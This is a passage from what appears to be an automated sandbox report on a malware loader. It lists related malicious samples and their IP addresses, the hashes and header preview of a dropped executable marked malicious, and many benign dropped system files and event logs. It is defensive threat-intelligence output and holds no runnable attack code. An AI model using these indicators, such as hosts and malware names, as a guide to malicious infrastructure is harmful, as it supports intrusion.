                                  SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                  • 172.67.19.24
                                  http://www.bollywoodhungama.comGet hashmaliciousUnknownBrowse
                                  • 104.26.8.169
                                  SecuriteInfo.com.Win64.DropperX-gen.15221.5174.exeGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  1GSERVERSUSsora.arm.elfGet hashmaliciousMiraiBrowse
                                  • 207.32.216.26
                                  PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                                  • 142.202.242.43
                                  System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                  • 142.202.242.43
                                  2BuZaUic3i.exeGet hashmaliciousRedLineBrowse
                                  • 207.32.219.79
                                  EpCrfIUgyF.exeGet hashmaliciousRedLineBrowse
                                  • 207.32.219.79
                                  04cde81ac938706771fa9fe936ee8f79fe7e079973098.exeGet hashmaliciousRedLine, XmrigBrowse
                                  • 142.202.242.45
                                  Facturation.exeGet hashmaliciousDoeneriumBrowse
                                  • 104.251.123.67
                                  SpelQ3Xvt7.exeGet hashmaliciousAveMaria, UACMeBrowse
                                  • 142.202.242.177
                                  http://khalidhost.loseyourip.com:777/dddd.mp4Get hashmaliciousUnknownBrowse
                                  • 207.32.217.25
                                  http://khalidhost.loseyourip.com:777/dddd.mp4Get hashmaliciousUnknownBrowse
                                  • 207.32.217.25

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Windows\Temp\gyqerfjfsbie.sysSecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                    Step 3 - Setup_Install.exeGet hashmaliciousXmrigBrowse
                                      SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exeGet hashmaliciousXmrigBrowse
                                        eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse
                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                            file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                gaber_mnr.ps1Get hashmaliciousMetasploit, XmrigBrowse
                                                  w0QdNGUNtd.exeGet hashmaliciousRedLineBrowse
                                                    SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\loader.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5502728
                                                      Entropy (8bit):6.538154728899747
                                                      Encrypted:false
                                                      SSDEEP:98304:wTjsUxLm7HrkZkwsrK8TrIVng9Hxw+4lJZlU0SY8j/42ULZKGDeSoMjWHpNXBN6:MjhWrkZkXzTrp9Hx8JZ9SY8zCw3SnjOo
                                                      MD5:CDABDC02374167CCD4938E9FE8C31789
                                                      SHA1:59028BD5DA928A0AADF157C39AC2C9281DCC881D
                                                      SHA-256:9161BE21746469B9B3C653B81D7CA6639927E89ECE780A4682A2059BA30E2793
                                                      SHA-512:7E823F4BC54E96E1B4B3972068B1495426ACB145BD9DDBFC7959FEFCA957D874DB844A39BFD6225A97DB31027ED226301F767E4D5CE708C8DA4AAD4E7BA11F61
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........,S.....@..........@.............................PT...........`.....................................................<....0T.P.....T.......S..+...@T.x...............................(.......8...............x............................text...&........................... ..`.rdata...<.......>..................@..@.data...H.S.......R.................@....pdata........T.......S.............@..@.00cfg........T.......S.............@..@.tls......... T.......S.............@....rsrc...P....0T.......S.............@..@.reloc..x....@T.......S.............@..B........................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                      Download File
                                                      Process:C:\Windows\System32\lsass.exe
                                                      File Type:very short file (no magic)
                                                      Category:modified
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                      Malicious:false
                                                      Preview:.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllultnxj:NllU
                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0prodgg4.t4a.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3rmdnhr.1vp.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0z4xaxe.mqh.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4igs0l0.4bk.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):4680
                                                      Entropy (8bit):3.71133572297434
                                                      Encrypted:false
                                                      SSDEEP:96:pYMguQII4iQm6h4aGdinipV9ll7UY5HAmzQ+:9A4zj/xne7HO+
                                                      MD5:B64154C7F9DE0F3E8C8F249DA663EC40
                                                      SHA1:EA38D4704DC18E444DBB2A23833A456089ECF013
                                                      SHA-256:3B685B81A7A9EC5D428DD97B381B41A63A2BE54733E9CBCF8D971BFB7DE77AB5
                                                      SHA-512:21338FD6D7DE8C73BE2226FECEA3E4F875503F444AE9D3A42555E6073B9386673F6F5B04412CA63AB541D37112F6ABF60447F7147A7B30FC6A2E5389CCF06F2C
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1079756391222424
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul0ll/lZ:NllUcl/
                                                      MD5:C296B0C35354DD06C955237718AAC40C
                                                      SHA1:DCE0F8D35974AA0AB49353CD949F2DD8F54B25FF
                                                      SHA-256:A6D63E2AE04A32B3609B7886FBF4D1E0D37B6293C1E8CF6415FED4B76001FC8D
                                                      SHA-512:1AEB19BF2D0C32B0E7ED32614AB1C0A263629D1D0967EAA4B6BFA6FCD81BCE0D0DCCCD596427880FCBC34D1911835FBD7364AE4002EDDCDA4BF63C66F42B7F75
                                                      Malicious:false
                                                      Preview:@...e.................................@..............@..........

                                                      C:\Windows\System32\winevt\Logs\Application.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3888
                                                      Entropy (8bit):3.649579905030079
                                                      Encrypted:false
                                                      SSDEEP:48:M3zrP+sXCrPwfFRVEfWb3/OoNM/yTL3WTeGeHSqdrSDFDSLI:WRCrup/vOo+SLGT/ujoFeI
                                                      MD5:F01F813838EE8E6AA01A1322AFC13CBE
                                                      SHA1:908704B300494EB9A6ADC351C2B1328762C462F4
                                                      SHA-256:D7D923744FADA67FA424D8DD0D5CD5388DDD73755B958828874A9A6DF17B4086
                                                      SHA-512:27CB868A04BB85934F8D317F4A1499B826EFFDB9AFC066F0667364D8EA7A89DC3E559113BD8414419C9ACAE7EE8EA9850C4DCEC162962583F1F73660B927F22D
                                                      Malicious:false
                                                      Preview:ElfChnk.................t.......t...............X...!.;.....................................................................y..!............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...................................................**..X...t........kQ..!..........D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.1669120609196026
                                                      Encrypted:false
                                                      SSDEEP:384:Ghe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842R:GVUHiapX7xadptrDT9W84y
                                                      MD5:C5116286214EE64F479940A11AE6AE06
                                                      SHA1:5EF7A5571A01449564964F77979385AB44E7AE4E
                                                      SHA-256:E457633148D325083196F0E05427D42DCD6BA60215863EE454EE54B7501A6C6F
                                                      SHA-512:128B8BB01FAB32785215CB408B8C40AC74DA153C4BD50369FFF727A8A1D9B9E8011852F85EC2BBC1866E70CC9DFAE36048B25B738496B50D4736DA656592F5F3
                                                      Malicious:false
                                                      Preview:ElfChnk.........1...............1...........p.......1..|........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.010692427789071
                                                      Encrypted:false
                                                      SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                      MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                      SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                      SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                      SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                      Malicious:false
                                                      Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):66960
                                                      Entropy (8bit):4.165323380336998
                                                      Encrypted:false
                                                      SSDEEP:384:CVMV6hfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgVL:Qhfyuct
                                                      MD5:06A420602500EF36F0F68D5F9AB66E81
                                                      SHA1:CB55D076F1561BC470F039A2757146AE5B51E6A4
                                                      SHA-256:A26FB6BF26226E65C50903D968E7B901F8F7D3065B8B8CAC4AD541060EF28C8A
                                                      SHA-512:DC9AABB6BA8684F6130E42B75F0FC4D257CFF7E60D5C24A76E316EB473024D4F6CF0F043457554CE66CE0E95EB67883F967B4BD372926FDF83503FA05C543960
                                                      Malicious:false
                                                      Preview:ElfChnk..............................................._.....................................................................5l>.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...................!............&...............................................................@.......X...a.!.....E..........@.....!....&O....0c'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**..............R....!..........

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.428039879966584
                                                      Encrypted:false
                                                      SSDEEP:384:hhTm5mcumNQYmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:hqcD6CL49mVpgwQFQ
                                                      MD5:F370E48DC8A79E8B25AABD90C8792FE9
                                                      SHA1:8E89951783F0E67BB9E56668F2E4733ED89B6509
                                                      SHA-256:32A383B047F8E04DCD1A2179C2DCA8206D75F50359496430A08ECB18C140DAF7
                                                      SHA-512:987DA0ED4E711F101D9CC77149AD8D461228EC8023F507C9A653A56010E27D7ABEFA7A28214F3A412769A586E8398D1FCB97501FEFAE9B25959004EFEC622E91
                                                      Malicious:false
                                                      Preview:ElfChnk..!.......!.......!.......!..................o...........................................................................................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.3524594952362487
                                                      Encrypted:false
                                                      SSDEEP:48:MPWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyVdHLP7jMzckH58ykHc:ONVaO8sMa3Z85ZMLQrjju3Z85Zu
                                                      MD5:42D893E89DF7DD4514ECAEBF1FC24AFC
                                                      SHA1:09C050EB0F1B945303A963F5190E79D1BD7A476F
                                                      SHA-256:D0AAD2D2D36666A05E81BA2DF16638EFCBA01936B0B09D158A7A6FC806B2CB8D
                                                      SHA-512:E7861511FE63D1E3741E8FA74B38955304B71DB5AD20765192C52E151CF095C9479526F2ED8264F9ECEA8552DBDC2ABBC0650131AA076E72F71CDC0AA53C7B9E
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................p.......-........................................................................:..............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.014860518194814
                                                      Encrypted:false
                                                      SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                      MD5:4FB8E2CF8B3F20534836684947962DC2
                                                      SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                      SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                      SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                      Malicious:false
                                                      Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.15655690871689
                                                      Encrypted:false
                                                      SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                      MD5:2DE60575CB719BF51FAB8A63F696B052
                                                      SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                      SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                      SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                      Malicious:false
                                                      Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):101120
                                                      Entropy (8bit):2.6687194151305405
                                                      Encrypted:false
                                                      SSDEEP:384:kosKxoEoaApoj+ylXMoefoay0oNoayBowoayboqoayhhdo69CcoTorNorWorbvoI:ziDCYFGDCYFt
                                                      MD5:A8144A83C7195965ACF9978B38BD2D30
                                                      SHA1:F1A911B761BCBF3A0EDCA021064F7736E6432ED2
                                                      SHA-256:93E817A4D1F70BEA5C31F8E9FE943A8341237EDDB20376B8F4E6BF0F524290AE
                                                      SHA-512:7CFCAAC2358D7B9A836819B4889EF87F6F4E865EE196955CADF98F175D24CDDF1E8DAD930C58C465E5F50B0706B1D7B1BA9229E078484769B398F13A195D7ABA
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................8J..pL..`.0....................................................................f..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**..............hh..!.............$..............................................................>.......V...X.!..e..............hh..!....&O....h!'O.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8524226245257144
                                                      Encrypted:false
                                                      SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                      MD5:B8E105CC52B7107E2757421373CBA144
                                                      SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                      SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                      SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                      Malicious:false
                                                      Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                      Download File
